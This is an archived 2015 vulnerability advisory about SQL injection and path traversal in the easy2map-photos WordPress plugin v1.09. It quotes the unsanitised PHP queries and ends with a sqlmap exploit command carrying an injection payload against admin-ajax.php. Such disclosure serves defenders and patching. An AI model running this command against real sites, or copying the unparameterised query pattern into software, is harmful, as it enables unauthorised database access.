Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:32327
HistoryJul 14, 2015 - 12:00 a.m.

SQL Injection in easy2map-photos wordpress plugin v1.09

2015-07-1400:00:00
vulners.com
24
JSON

Title: SQL Injection in easy2map-photos wordpress plugin v1.09
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map-photos
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.1.0
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=130
Description: Easy2Map Photos is a simple-yet-powerful tool for generating great-looking geo-tagged photo galleries.
Vulnerability:
The following lines in includes/Functions.php are vulnerable to SQL injection attack because they aren’t parameterized or sanitizing user input.

48 $wpdb->query(sprintf("UPDATE $mapsTable
49 SET PolyLines = '%s'
50 WHERE ID = '%s';", $PolyLines, $mapID));
218 $wpdb->query(sprintf("
219 UPDATE $mapsTable
220 SET TemplateID = '%s',
221 MapName = '%s',
222 Settings = '%s',
223 CSSValues = '%s',
224 CSSValuesPhoto = '%s',
225 CSSValuesMap = '%s',
226 MapHTML = '%s',
227 IsActive = 1
228 WHERE ID = %s;",
229 $_REQUEST['mapTemplateName'],
230 $_REQUEST['mapName'],
231 urldecode($_REQUEST['mapSettingsXML']),
232 urldecode($_REQUEST["parentCSSXML"]),
233 urldecode($_REQUEST["photoCSSXML"]),
234 urldecode($_REQUEST["mapCSSXML"]),
235 urldecode($_REQUEST["mapHTML"]), $mapID));

238 //this is a map insert
239 if (!$wpdb->query(sprintf("
240 INSERT INTO $mapsTable(
241 TemplateID,
242 MapName,
243 DefaultPinImage,
244 Settings,
245 LastInvoked,
246 PolyLines,
247 CSSValues,
248 CSSValuesPhoto,
249 CSSValuesMap,
250 MapHTML,
251 IsActive
252 ) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s' , 0);",
253 $_REQUEST['mapTemplateName'],
254 $_REQUEST['mapName’]

331 $wpdb->query(sprintf("
332 UPDATE $mapsTable
333 SET MapName = '%s'
334 IsActive = 1
335 WHERE ID = %s;",
336 $_REQUEST['mapName'],
337 $mapID));

Also

In MapPinImageUpload.php and MapPinIconSave.php this code would allow someone to create files outside of the intended upload directory by adding …/…/…/…/ path traversal characters:

if (!file_exists($imagesDirectory)) {
mkdir($imagesDirectory);
}

CVEID: 2015-4615 2015-4617
OSVDB:
Exploit Code:
• $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3

JSON